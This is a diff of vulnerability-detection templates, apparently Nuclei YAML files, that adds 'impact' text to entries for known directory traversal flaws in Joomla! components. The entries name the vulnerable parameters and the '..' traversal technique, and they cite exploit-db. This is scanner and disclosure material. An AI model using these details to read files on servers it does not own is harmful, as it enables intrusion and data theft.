# digest: 4a0a0047304502204dc0e897ea68285bef1f12bcf5834d2cf101e68c156ce46626c2a06f4985d407022100822e5427795b4bd8e13344064b70a624e097115c521a1eea3ec95769751e9e83:922c64590222798bb761d5b6d8e72950 # digest: 490a0046304402200df40dfac907595943e5906f98bfab1609a82ae9c703da4b7d0fb4ea5284c2b9022073136420b9d293e938fbbd6db582642f6c0f5836eda85d321af7e0855670c72b:922c64590222798bb761d5b6d8e72950

View File

@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: A directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter. description: A directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter.
impact: |
An attacker can exploit this vulnerability to retrieve arbitrary files from the server.
remediation: Upgrade to the latest version to mitigate this vulnerability. remediation: Upgrade to the latest version to mitigate this vulnerability.
reference: reference:
- https://www.exploit-db.com/exploits/11447 - https://www.exploit-db.com/exploits/11447
@ -39,4 +41,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4b0a00483046022100aecd172f508073b0b8d64784bcb420de171daff3e0a8732d29ac71488c81596f022100f9b3c9f9ed1f055178cca21e303628b061871cbbd562c6202a00d7a71ced76e5:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100801f99e10fa7f37fb9a01ff4c8eb0a4b11e2193c7e16b9c3b8a0c50ca6e4a242022077c086d823e3b8131dff5b37562334ce5fb778ead2312cb35f1b49c8fc26f8fc:922c64590222798bb761d5b6d8e72950

View File

@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: A directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter. description: A directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter.
impact: |
Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access or information disclosure.
remediation: Upgrade to the latest version to mitigate this vulnerability. remediation: Upgrade to the latest version to mitigate this vulnerability.
reference: reference:
- https://www.exploit-db.com/exploits/11498 - https://www.exploit-db.com/exploits/11498
@ -39,4 +41,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 490a0046304402205591d9316f159c3eb27f1e668e68d61205761aaa141dbe50f406eb90e779fa5602207db633a31bf0a118f73eed7a38df4e593557497eafcd2199a5435cf7bf09c1d4:922c64590222798bb761d5b6d8e72950 # digest: 490a004630440220255aee4e219ee166e143888630a4e6af23c3e9b385d922dd866339bdc5d96be2022071f5391c8ceecfede26dd5441388c1f6728c9f693e05b50f408851b94f23f21a:922c64590222798bb761d5b6d8e72950

View File

@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: Directory traversal vulnerability in the jVideoDirect (com_jvideodirect) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. description: Directory traversal vulnerability in the jVideoDirect (com_jvideodirect) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
impact: |
An attacker can exploit this vulnerability to read arbitrary files on the server.
remediation: Apply all relevant security patches and product upgrades. remediation: Apply all relevant security patches and product upgrades.
reference: reference:
- https://www.exploit-db.com/exploits/11089 - https://www.exploit-db.com/exploits/11089
@ -39,4 +41,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 490a00463044022006730e9bc41d35c653ab87390772b2a4df527eb5cb3c9344d8dd31c4a2fc4f4202201c6ad57ef58398872f397ae0061c50864c955cd569b5f40316da8f32f5f15289:922c64590222798bb761d5b6d8e72950 # digest: 490a00463044022078b7a4981e20f380f36effbae103d8a364963690fa024b7b4b7f0a7731eb4faa022074cef19a8c876a25c892881ca87de44f31f764fac0538c01c8de31916e40390c:922c64590222798bb761d5b6d8e72950

View File

@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: A directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php. description: A directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php.
impact: |
An attacker can exploit this vulnerability to read arbitrary files on the server.
remediation: | remediation: |
Update to the latest version of Joomla! Component com_jashowcase to fix the directory traversal vulnerability. Update to the latest version of Joomla! Component com_jashowcase to fix the directory traversal vulnerability.
reference: reference:
@ -39,4 +41,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a00473045022100b4abc2e6bac634509e9798e53e57b2bf8a45ca56ea0a39fd25d23d5cdffeabe102204899c1bede7831fe28b97c5b8da0cc7813575cd66ce76771af9cda761cfefc91:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100fe6e90550c4cac8714140e552ca1f8dffae1d1cf10acfda1fc2a4f1eeb04e6070220261fe0eb98e8dd254ca2bcec2deb3e7ca3c6a2bb20a00488f400c2ba4764814d:922c64590222798bb761d5b6d8e72950

View File

@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: A directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. description: A directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
impact: |
An attacker can exploit this vulnerability to read arbitrary files on the server.
remediation: Apply all relevant security patches and product upgrades. remediation: Apply all relevant security patches and product upgrades.
reference: reference:
- https://www.exploit-db.com/exploits/11088 - https://www.exploit-db.com/exploits/11088
@ -40,4 +42,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4b0a0048304602210093fe6fc6aafb9aae82395913f89c943a912983b9c5963c6f58f9b5fa0209f5c9022100f3694c1e8c9202a4cf29516761dba19426b82ac5ac959b3c88540c780c35b698:922c64590222798bb761d5b6d8e72950 # digest: 4a0a0047304502210087ecb7ece9df8ee3e3e0fc6760a67762868e12f33b0c59f6ea3bc3ccc135a1b10220607ba4bacb84ca32dd3502bcd9973930e71855eb417a6afbb0bc270df349b136:922c64590222798bb761d5b6d8e72950

View File

@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: A directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. description: A directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
impact: |
Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access or information disclosure.
remediation: Apply all relevant security patches and product upgrades. remediation: Apply all relevant security patches and product upgrades.
reference: reference:
- https://www.exploit-db.com/exploits/11738 - https://www.exploit-db.com/exploits/11738
@ -39,4 +41,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4b0a00483046022100a6b583f7a3d7c073b0520d3c46a03a8381d6af0c086b1e37d29a024ce3a4736f022100cceb855f29d8dbef1c720e88cc3b9e57f023e4eeed5ff44b55a8b3c5f105e020:922c64590222798bb761d5b6d8e72950 # digest: 4b0a00483046022100835d6327ecf3d8a79d891ab1671b58279390bedc0356214c4e0de666716a7abf022100e97639abcc162d391b35333f8165ab636eb06cff21510992ef20035e525b535f:922c64590222798bb761d5b6d8e72950

View File

@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: A directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. description: A directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
impact: |
Allows an attacker to read arbitrary files on the server, leading to potential information disclosure and further exploitation.
remediation: Apply all relevant security patches and product upgrades. remediation: Apply all relevant security patches and product upgrades.
reference: reference:
- https://www.exploit-db.com/exploits/10942 - https://www.exploit-db.com/exploits/10942
@ -37,4 +39,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 490a0046304402207804d47856db88004e7d770a6b9e4905869a3bf0bb5f80c77a0db3fc02ab2e0702207ef90a49afdf02b83e9ae8900297deec4d77ec96ed9e67afa4ad99a64d3c1da5:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022004764a55873eedeef437f72de5243dc952d7938bf93ba6a44be94b1e3203d4b40221009e8e1775682357e291ce78522ca980a6d8238ef79e4e6f7cf72548f7e5bec5aa:922c64590222798bb761d5b6d8e72950

View File

@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: A directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. description: A directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.
remediation: Apply all relevant security patches and product upgrades. remediation: Apply all relevant security patches and product upgrades.
reference: reference:
- https://www.exploit-db.com/exploits/10948 - https://www.exploit-db.com/exploits/10948
@ -39,4 +41,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a00473045022055b85a1187baab16c8619c44f333fa95a769f02d9c90cdc3b92da9af37ea765c022100ec5a4ddaf568dd08d9c499fa59981a08562d8b461b1d21bb0dc8d0479619d3b1:922c64590222798bb761d5b6d8e72950 # digest: 4b0a00483046022100f11e7c1ef169ed3e6f170b354e5066def58df0ecb303905be2cb692bc749d50f022100bc2fa70ab2d2506cdd3c9d9a30d099823223d9a45ca34c9ebef974f8ebb45242:922c64590222798bb761d5b6d8e72950

View File

@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: A directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. description: A directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
remediation: Apply all relevant security patches and product upgrades. remediation: Apply all relevant security patches and product upgrades.
reference: reference:
- https://www.exploit-db.com/exploits/11760 - https://www.exploit-db.com/exploits/11760
@ -39,4 +41,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a00473045022100a460424f7d97033dcbe266eb3791229f7a28b8fc530061e37d85ab04597effb002200a8c83bccd2fed2c3c8bfe321e68864093f992bda6481aa461d52b0a581836f2:922c64590222798bb761d5b6d8e72950 # digest: 4a0a0047304502206f23347fc78c49c9e4569468806b46c1f3a0a646c189a57c6e021e848668bc52022100d08e6c11bd627fc6eb6668dd39684ae70f76f50186063a230f92a15306a6dafe:922c64590222798bb761d5b6d8e72950

View File

@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: A directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. description: A directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation.
remediation: Apply all relevant security patches and product upgrades. remediation: Apply all relevant security patches and product upgrades.
reference: reference:
- https://www.exploit-db.com/exploits/11511 - https://www.exploit-db.com/exploits/11511
@ -38,4 +40,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a00473045022100de73743eee8e218a64f00aee1fe51a44879f19bcc8b23166f946f07745624b6d02200c0609ad7c96266004a9dbd6ffe741bfeb5bfd2af21dc17c18c71b2b1deea71d:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100e30cde27274d020eca121c42cb054cc13396f5f6f7ec473d9e230814405ba65f02207f6f47e4db6c69be8b7442d0214777a30b8b37a8b5f04dd07b5e7e12bd3c3ee5:922c64590222798bb761d5b6d8e72950

View File

@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: A directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE -- the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected. description: A directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE -- the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
remediation: Apply all relevant security patches and product upgrades. remediation: Apply all relevant security patches and product upgrades.
reference: reference:
- https://www.exploit-db.com/exploits/11814 - https://www.exploit-db.com/exploits/11814
@ -39,4 +41,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4b0a00483046022100bd055bd6502d4b4a22b3f99f8b75ae7fd4d249a00d2d63062d041dd7dc23747d022100f3d3a5787ce5a40534d37ac4cde47925775cf0f453c8048bad186baee48a0e4d:922c64590222798bb761d5b6d8e72950 # digest: 490a0046304402204b0e6fbebe96039eec5eb535b07e2d769ebf29d714105a0e8516df81a99580eb02200d0bce9a850e85fdf23c0adde163f704107a4b53554740537a0b640c66956d6f:922c64590222798bb761d5b6d8e72950

View File

@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: A directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php. description: A directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.
remediation: Upgrade to the latest version to mitigate this vulnerability. remediation: Upgrade to the latest version to mitigate this vulnerability.
reference: reference:
- https://www.exploit-db.com/exploits/11757 - https://www.exploit-db.com/exploits/11757
@ -38,4 +40,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 490a00463044022028b9258dfa53cbf4a25f22b1a2d54ca076fd0af9d1b91249b029d848b42cbc7002202aba1a085f6eeb87eacccc07c59515c2e66ae771bd35fee5cedb8b8aa36620a7:922c64590222798bb761d5b6d8e72950 # digest: 4a0a004730450220596ef1369c12f8e3a916e8f9e33299432b1178e9ce95fde59ddc34f77142d2f7022100e9739fb2c8ce4e2826687b0ebd6931d92e35a1568effea53043306c97259db88:922c64590222798bb761d5b6d8e72950

View File

@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: A directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. description: A directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
impact: |
Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access or information disclosure.
remediation: Upgrade to the latest version to mitigate this vulnerability. remediation: Upgrade to the latest version to mitigate this vulnerability.
reference: reference:
- https://www.exploit-db.com/exploits/11978 - https://www.exploit-db.com/exploits/11978
@ -37,4 +39,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a004730450220346626db9d1e2e9dc2cb7b66f34fd4785e75af4d9d5f7c6643cb298e1be166ad022100a2d43a822439066dbbd49736f821a4ffa4128015862c28991a7e243f7d511cfd:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100b57708e6b86599b708a873726d3263ce9e0d49d0e76391bb6e037a1e4937404e02205933cbacd47892558c18c7db7b4e88a0b4baec456d1c7c5491d0e2c9866f4c1c:922c64590222798bb761d5b6d8e72950

View File

@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: A directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. description: A directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
remediation: Upgrade to the latest version to mitigate this vulnerability. remediation: Upgrade to the latest version to mitigate this vulnerability.
reference: reference:
- https://www.exploit-db.com/exploits/12065 - https://www.exploit-db.com/exploits/12065
@ -40,4 +42,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a00473045022100e0a4475a7c35058ce79f49d108bb180242d90cc120c530dd911afd5c66f8a9dc022076d45a27b53fd0cafb5d7adac7596d2f6b6c776544037f7117ba2e8693824aec:922c64590222798bb761d5b6d8e72950 # digest: 4b0a00483046022100e7b04454a6bb69f264e4dd4754eee56b3022c4c5ac84e46575de2bb39dcd4a51022100956719ea0bbde43fd2079b3d401d9f87038ff2daa9c9f264755da2c0fc2a9aae:922c64590222798bb761d5b6d8e72950

View File

@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: A directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php. description: A directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
remediation: Upgrade to the latest version to mitigate this vulnerability. remediation: Upgrade to the latest version to mitigate this vulnerability.
reference: reference:
- https://www.exploit-db.com/exploits/12058 - https://www.exploit-db.com/exploits/12058
@ -38,4 +40,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4b0a00483046022100db8f60e834d718a187a6affc3ddd8cb07625e1fb067e4d68b5a6f6bab98a0eb3022100b6da76ed5c5b35f5529aa45b95f8de9cc608a6c066dd69264579dc8b909dd0bb:922c64590222798bb761d5b6d8e72950 # digest: 4b0a00483046022100e1f4f0060c68c73b81b05fa0c036c433de7e7de661c13e245b6519b209dd0686022100f724f0853fa864ea201f7b3377b3a7ae4bafc82fb0db4544f09b7092d505e11c:922c64590222798bb761d5b6d8e72950

View File

@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: A directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. description: A directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
remediation: Upgrade to the latest version to mitigate this vulnerability. remediation: Upgrade to the latest version to mitigate this vulnerability.
reference: reference:
- https://www.exploit-db.com/exploits/12070 - https://www.exploit-db.com/exploits/12070
@ -39,4 +41,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a00473045022048439f47a8b21a74b4b97fa613ad972080db3db4fe053230262199d82317045c022100eadd5c390ee4731465f6f514079896cd72f934fd9895315d895f65374aea4e72:922c64590222798bb761d5b6d8e72950 # digest: 4a0a0047304502204ea305e21cf6b002e44afd364c3d21030b96316a544c492604ec10f5ff96ecac022100cca452f129982dde163f273a63e54d06d5e6496eef9837cb8c2de19cbe2f74cc:922c64590222798bb761d5b6d8e72950

View File

@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: A directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. description: A directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
remediation: Upgrade to the latest version to mitigate this vulnerability. remediation: Upgrade to the latest version to mitigate this vulnerability.
reference: reference:
- https://www.exploit-db.com/exploits/12066 - https://www.exploit-db.com/exploits/12066
@ -38,4 +40,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 490a0046304402206a9af6404f873c9d3a57fe9df213511138f01fd29e3ea7105a802d41cf78924102205cb464a7bda81580894d76175190846c791dc1cd402a21817590737b159112e2:922c64590222798bb761d5b6d8e72950 # digest: 490a00463044022064827a2b3a8d58ef4a2a3c46803548cec0052632c4c7f8d21f18118ebd14b3c6022058eb78319f044f69ba50ef4e0d899e39e70636966010a842185bd8f281387cc8:922c64590222798bb761d5b6d8e72950

View File

@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: A directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. description: A directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
impact: |
Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage.
remediation: Upgrade to the latest version to mitigate this vulnerability. remediation: Upgrade to the latest version to mitigate this vulnerability.
reference: reference:
- https://www.exploit-db.com/exploits/12077 - https://www.exploit-db.com/exploits/12077
@ -38,4 +40,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4b0a00483046022100f17626c6c2fb265ab27fa0646a728898f1b0c9f3fa847a9fb431a0e39fa82e8b022100f8103d182a1847d338a89d951149a9075835a9588ed011933dfed7688f480995:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100867fd351a2a90244ed77e8046adc2180f92604b75e069d398751668b18310e9802202d41ba7430bbc6e96d855278855e1aefd1286ec09c836f3de9de918bde460e87:922c64590222798bb761d5b6d8e72950

View File

@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: A directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. description: A directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and compromise of the Joomla! CMS.
remediation: Upgrade to the latest version to mitigate this vulnerability. remediation: Upgrade to the latest version to mitigate this vulnerability.
reference: reference:
- https://www.exploit-db.com/exploits/12082 - https://www.exploit-db.com/exploits/12082
@ -38,4 +40,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a00473045022100fd165e012bb572dc265b83b5ca8b9c947ddf01bea06fde0c71635d59e7c796e0022013898e8cab7e473e13999ca183c3d97e6bc26290443ddbae95c4946d4faf0ef0:922c64590222798bb761d5b6d8e72950 # digest: 490a00463044022069608b00d6cce302d41960d97e53dffd2328158a421962cdc5d326a3c65c13d60220253869fcf736190901161cb37df82fd67626fa6b943ac18ade19c1ade10bcba0:922c64590222798bb761d5b6d8e72950

View File

@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: A directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. description: A directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
remediation: Upgrade to the latest version to mitigate this vulnerability. remediation: Upgrade to the latest version to mitigate this vulnerability.
reference: reference:
- https://www.exploit-db.com/exploits/12086 - https://www.exploit-db.com/exploits/12086
@ -38,4 +40,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a00473045022100c6e61051c3e71766db8c93f1cba690d9e313100d617e7e936a55e737e9bfb3a802206edbc197346bf2a84a7297e202c7b67251c8f0546df7eb690cfaaa5d18b11595:922c64590222798bb761d5b6d8e72950 # digest: 490a0046304402203ab74f27464637000a111771ceabe7ebf60c232bbce13a6e98a322da6de8bee8022004e7174b83c84a10ed6ef3361845038a32769c167a8c9af5e13cf68801097e59:922c64590222798bb761d5b6d8e72950

Some files were not shown because too many files have changed in this diff Show More